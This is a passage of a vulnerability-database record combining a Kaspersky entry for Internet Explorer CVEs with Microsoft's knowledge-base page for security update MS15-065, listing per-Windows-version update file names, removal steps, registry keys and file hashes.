"2015-07-14T00:00:00", "type": "kaspersky", "title": "KLA10634 Multiple vulnerabilities in Microsoft Internet Explorer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1729", "CVE-2015-1733", "CVE-2015-1738", "CVE-2015-1767", "CVE-2015-2372", "CVE-2015-2383", "CVE-2015-2384", "CVE-2015-2385", "CVE-2015-2388", "CVE-2015-2389", "CVE-2015-2390", "CVE-2015-2391", "CVE-2015-2397", "CVE-2015-2398", "CVE-2015-2401", "CVE-2015-2402", "CVE-2015-2403", "CVE-2015-2404", "CVE-2015-2406", "CVE-2015-2408", "CVE-2015-2410", "CVE-2015-2411", "CVE-2015-2412", "CVE-2015-2413", "CVE-2015-2414", "CVE-2015-2419", "CVE-2015-2421", "CVE-2015-2422", "CVE-2015-2425"], "modified": "2020-06-18T00:00:00", "id": "KLA10634", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10634/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:35:53", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage.</p><h2>Summary</h2><div class=\"kb-summary-section section\"><span></span>This security update resolves several reported vulnerabilities in Internet Explorer. The most severe of these vulnerabilities could allow remote code execution if a user views a specially crafted webpage in Internet Explorer. To learn more about the vulnerabilities, see <a href=\"https://technet.microsoft.com/library/security/ms15-065\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS15-065</a>.<br/><br/></div><h2>How to obtain and install the update</h2><div class=\"kb-summary-section section\"><h3 class=\"sbody-h3\">Method 1: Microsoft Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-3\" target=\"_self\">Get security updates automatically</a>. <br/><br/><span class=\"text-base\">Note</span> For Windows RT and Windows RT 8.1, this update is available only through Microsoft Update.</div><h3 class=\"sbody-h3\">Method 2: Microsoft Download Center</h3>You can obtain the stand-alone update package through the Microsoft Download Center. Go to <a href=\"https://technet.microsoft.com/library/security/ms15-065\" id=\"kb-link-4\" target=\"_self\">Microsoft Security Bulletin MS15-065</a> to find the download links for this update.</div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Additional information about this security update</h3>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/><ul class=\"sbody-free_list\"><li><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3065822\" id=\"kb-link-5\">3065822 </a> MS15-065: Description of the security update for Internet Explorer: July 14, 2015 </div></span></li><li><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3074886\" id=\"kb-link-6\">3074886 </a> OneNote app cannot open notebooks, and an ActiveX control cannot be installed in Internet Explorer </div></span></li><li><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3075516\" id=\"kb-link-7\">3075516 </a> MS15-065: Description of the security update for JScript9.dll in Internet Explorer: July 14, 2015 </div></span></li></ul><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\">Windows Server 2003 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported 32-bit editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3065822-x86-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported x64-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3065822-x64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported Itanium-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3065822-ia64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported 32-bit editions of Windows Server 2003:<br/><span class=\"text-base\">IE7-WindowsServer2003-KB3065822-x86-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported x64-based editions of Windows Server 2003:<br/><span class=\"text-base\">IE7-WindowsServer2003-KB3065822-x64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported Itanium-based editions of Windows Server 2003:<br/><span class=\"text-base\">IE7-WindowsServer2003-KB3065822-ia64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 for all supported 32-bit editions of Windows Server 2003:<br/><span class=\"text-base\">IE8-WindowsServer2003-KB3065822-x86-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 for all supported x64-based editions of Windows Server 2003:<br/><span class=\"text-base\">IE8-WindowsServer2003-KB3065822-x64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/262841\" id=\"kb-link-8\" target=\"_self\">Microsoft Knowledge Base Article 262841</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/>KB3065822.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/>KB3065822-IE7.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 for all supported 32-bit editions and x64-based editions of Windows Server 2003:<br/>KB3065822-IE8.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/>Use the <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel. Or, use the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB3065822$\\Spuninst folder</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/>Use the <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel. Or, use the Spuninst.exe utility that is located in the %Windir%\\ie7updates\\KB3065822-IE7\\spuninst folder</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 for all supported 32-bit editions and x64-based editions of Windows Server 2003:<br/>Use the <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel. Or, use the Spuninst.exe utility that is located in the %Windir%\\ie8updates\\KB3065822-IE8\\spuninst folder</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822 \" id=\"kb-link-9\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP3\\KB3065822\\Filelist</strong></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP0\\KB3065822-IE7\\Filelist</strong></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 for all supported 32-bit editions and x64-based editions of Windows Server 2003:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP0\\KB3065822-IE8\\Filelist</strong></td></tr></table></div><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">IE8-Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">IE8-Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">IE9-Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">IE9-Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-10\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-11\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3065822-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">IE8-Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">IE8-Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">IE9-Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 in all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">IE9-Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-12\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-13\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">IE9-Windows6.1-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">IE9-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 for Windows 7 for 32-bit Systems Service Pack 1:<br/><span class=\"text-base\">IE10-Windows6.1-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 for Windows 7 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE10-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 for Windows 7 for 32-bit Systems Service Pack 1:<br/><span class=\"text-base\">IE11-Windows6.1-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 for Windows 7 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE11-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-14\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">System and Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-15\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3065822-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">IE9-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 for Windows Server 2008 R2 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE10-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 for Windows Server 2008 R2 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE11-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-16\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">System and Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-17\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 8 and Windows 8.1 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 10 in all supported 32-bit editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 in all supported x64-based editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-18\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates<span class=\"text-base\">.</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-19\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 10 in all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates<span class=\"text-base\">.</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-21\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows RT and Windows RT 8.1 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">This update is available through <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-22\" target=\"_self\">Windows Update</a>.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then lick <span class=\"text-base\">Windows Update</span>. Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">Not applicable</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File hash information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3065822-x64.msu</td><td class=\"sbody-td\">F6C7FF7EACF64A3A75C0F777C472A7273EDCEF00</td><td class=\"sbody-td\">8879F745DA53B9386C3568D4141179CA083587E249CE3776F6DDA4BAA0BD7267</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3065822-x86.msu</td><td class=\"sbody-td\">7296D7A409DFCC302B8C1010B3D3A08E9D33C7F2</td><td class=\"sbody-td\">35D956165837B1C95D5C94AD7F069FD72CAF6D6A8DDD1A5555DD3D12229EBD9E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3074886-x64.msu</td><td class=\"sbody-td\">E65DB15B393FE6917A689D03BAA81325BB67A1BB</td><td class=\"sbody-td\">ED196D463B5B49511509EDE6BC368CC21306B4A19D0E305A7A46C671532C5598</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3074886-x86.msu</td><td class=\"sbody-td\">847FEBB8AF4C3FF86FD768E6D0D37941CE9E7FAA</td><td class=\"sbody-td\">421B966292586BF3AE242D0B84C182A845A45CF5B7134EAAA03953B6EB48154A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3075516-x64.msu</td><td 